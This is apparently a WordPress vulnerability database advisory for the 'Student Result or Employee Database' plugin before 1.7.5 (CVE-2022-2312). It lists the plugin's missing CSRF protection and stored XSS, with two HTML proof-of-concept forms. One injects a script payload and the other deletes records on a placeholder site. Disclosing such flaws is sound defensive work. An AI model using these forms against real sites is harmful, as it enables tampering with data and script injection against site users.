WordPress Plugin Vulnerabilities

Student Result or Employee Database < 1.7.5 - Stored Cross Site Scripting via CSRF

Description

The plugin does not have CSRF in its AJAX actions, allowing attackers to make logged in user with a role as low as contributor to add/edit and delete students via CSRF attacks. Furthermore, due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site scripting

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?action=ssr_add_st_submit" method="POST">
      <input type="hidden" name="rid" value='<script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?action= ssr_del_st_submit" method="POST">
      <input type="hidden" name="postID" value="<RID>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
simple-student-result
Fixed in 1.7.5

References

CVE
CVE-2022-2312

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Vinay Varma Mudunuri, Krishna Harsha Kondaveeti
Submitter
Vinay Varma Mudunuri
Verified
Yes
WPVDB ID
7548c1fb-77b5-4290-a297-35820edfe0f8

Timeline

Publicly Published
2022-08-01 (about 1 years ago)
Added
2022-08-01 (about 1 years ago)
Last Updated
2023-04-28 (about 7 months ago)

Other

Published
Title
Published
2021-08-30
Title
WP Statistic < 13.1 - Reflected Cross-Site Scripting (XSS)
Published
2023-04-13
Title
Betheme < 26.8 - Reflected XSS
Published
2023-09-01
Title
Font Awesome 4 Menus <= 4.7.0 - Contributor+ Stored XSS
Published
2020-05-12
Title
WooCommerce < 4.1.0 - Unescaped Metadata when Duplicating Products
Published
2023-01-24
Title
Product Slider and Carousel with Category for WooCommerce < 2.8 - Contributor+ Stored XSS via Shortcode